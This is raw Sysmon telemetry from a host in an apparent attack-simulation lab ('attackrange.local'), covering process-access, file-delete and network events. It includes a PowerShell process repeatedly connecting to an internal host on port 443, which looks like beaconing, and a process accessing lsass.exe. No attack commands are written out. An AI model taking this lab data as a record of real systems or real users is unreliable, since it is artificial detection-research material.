13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:38.617{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.602{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.071{B81B27B7-A079-6140-7256-04000000C801}41805564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1354D9542F0ABF20CF530871D8C79B76,SHA256=3FD216DA47F404737FDA0A2DD733411735F83DB520403756A6F296A0FDA9E103,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:39.153{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.150{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497093Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.134{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:40.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99351CB791B0F3E9F8A35440C967B102,SHA256=278DA909F3A32FD86E3009E817CA81E92D65BE920C7A1438C6D16B91A2025C68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036497102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:40.136{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26F84F1BC30CFF57779AAEF8B11297CD,SHA256=6CD053D984782F311C8BC5CD90458C039C54F3B7A7FCEC2D7FFD398CD4C3EEBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:41.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2362623A0AD0CDB052F032941E16FFC1,SHA256=0809C76B5EDA3E8336C963C7BE2A4AD294D5899858E4D94EA4B50824A37A2672,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:11.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50494-false10.0.1.12-8000- 354300x800000000000000036497105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:11.640{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50493-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:41.054{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4EB9793566FBFEEDE40ABC117FAA4278,SHA256=1A39B4D6631670174E968055DC8B069699B04563C776433B36C9EF0C7E378D7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:42.917{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D2F6A0562E384A520FE17D17417A3D5,SHA256=E849A9A1A12935720BC274F3442AF81DAF89BBD50F2D25F862ECB161B8A5C857,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:43.949{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D34FA7F24BD7EEA71EE98B3382F41B24,SHA256=78231D69EBF8563D15E0DD745E972F19C6C8A96FB6449F5342922D18319246D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:44.983{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A13A2DCA9C59E57273F176AC24DDA0,SHA256=9C0DC6E5A88B35456E17CBFDEFA6811BEB35370D9DED4A19ADF6B6AFD3A7F530,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000036497113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:16.651{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50495-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:46.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A1159EC132D40D0BCB348D696793AD4E,SHA256=2EF211F538DD6CC19C31A4DE3AD703BCBEE170FB709215AF660F46FF7391A7A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:45.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF2C40A5EE7589232FAAE0B3C27FEC1C,SHA256=5665DC0EBC0DA3E1388C56AFB08BD69E0090EE6752FC66ADDEB5DA9BEEEA7A2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:47.013{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93083A0EF4815D8AB58276D2A5379352,SHA256=A3F2BFDE3417BA787BCAA0DEEE9243A5D9C1400550A458BE7E5093017B685BBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:17.780{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50496-false10.0.1.12-8000- 23542300x800000000000000036497115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:48.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6011C35B229A582DC391E37F5E72576,SHA256=851D00C4256CCAC6769210EF36B3C19E99B01F7F91D340EBBA03C458084FFEE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:49.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A019ADB1EEDD5EEBCBDEC946961F8EA,SHA256=7EABE6447C0DF463281AE10203C208AB5C9E18661DC44F273D493BA2F4AAF595,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:50.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97D34A0F1059F9C95888368772CF49A2,SHA256=E1B0EB201729A6D57EA5EED26E538C549802519DF4D2C17DBBC96D9462C01656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:21.661{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50497-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:51.193{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA2456D7D678EED62071D4474A5BEF84,SHA256=6CD1EF0890E8C9DD481E4B2D74AB163BC9A2E966C8E40886C4CDA19397304855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:51.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4982B298B7EF2C192821E60CA9AE0185,SHA256=BD9A3479898CC0950905BAF031A0CE0E4E21D13E04FE785FE9B972641053D15A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:52.207{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78A5984AE9C2B597E5603466323FD489,SHA256=429BCFBD699C0E27971918577AA70C7D3471C048A343841F16CCDB71C950CC13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:23.774{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50498-false10.0.1.12-8000- 23542300x800000000000000036497123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:53.221{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0EAE41BBDA5C43FEBDC01F2BD19240,SHA256=C646A8E1D06F923287690A96B203D8207FDAA7B5788A97F013DC0B880B708DB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:54.239{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD6B4AB99AF7D2DE2D78CE8887782D7C,SHA256=86F3CAA9C21B9C9115148B28F029A2FBC2998895C9EDC201D5BC7448779FFAE9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:55.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58ABC2638044698AB580C2237B7C6054,SHA256=D04220EA998BE8C86BBDA7FE62B9AC9023BADFF84D4582092C76D750DFE750CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.703{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
